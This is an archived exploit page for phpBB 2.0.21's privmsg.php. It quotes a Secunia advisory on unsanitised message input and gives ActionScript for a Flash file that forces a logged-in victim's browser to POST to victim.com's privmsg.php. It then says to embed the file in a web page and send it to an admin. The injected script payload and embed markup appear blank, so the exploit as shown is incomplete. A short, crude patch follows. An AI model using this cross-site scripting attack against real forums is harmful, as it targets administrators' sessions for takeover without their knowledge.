TUCoPS :: Web BBS :: Frequently Exploited :: c07-1832.htm

phpBB (privmsg.php) XSS Exploit
phpBB (privmsg.php) XSS Exploit
phpBB (privmsg.php) XSS Exploit



phpBB (privmsg.php) XSS Exploit

By: Demential
Web: http://headburn.altervista.org 
E-mail: info@burnhead.it 
PhpBB website: http://phpbb.com 

Exploit tested on phpBB 2.0.21

Secunia.com said:

Input passed to the form field "Message body" in privmsg.php
is not properly sanitised before it is returned to the user
when sending messages to a non-existent user.
This can be exploited to execute arbitrary HTML and script code
in a user's browser session in context of an affected site.

The Exploit:

Create a Shockwave Flash file with this code:

var username:String = "user_that_doesnt_exist";
var subject:String = "Xss Exploitation";
var message:String = ""; 
var folder:String = "inbox";
var mode:String = "post";
var post:String = "Submit";
getURL("http://victim.com/phpBB2/privmsg.php", "_self", "POST"); 

Put it into a web page:



Put a title here


Put some text here

And send it to the admin (or a normal user) users must be logged-in. Fixing: open phpBB2/privmsg.php find: if (!($to_userdata = $db->sql_fetchrow($result))) { $error = TRUE; $error_msg = $lang['No_such_user']; replace with: if (!($to_userdata = $db->sql_fetchrow($result))) { $error = TRUE; echo "Sorry, but no such user exists."; exit;

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH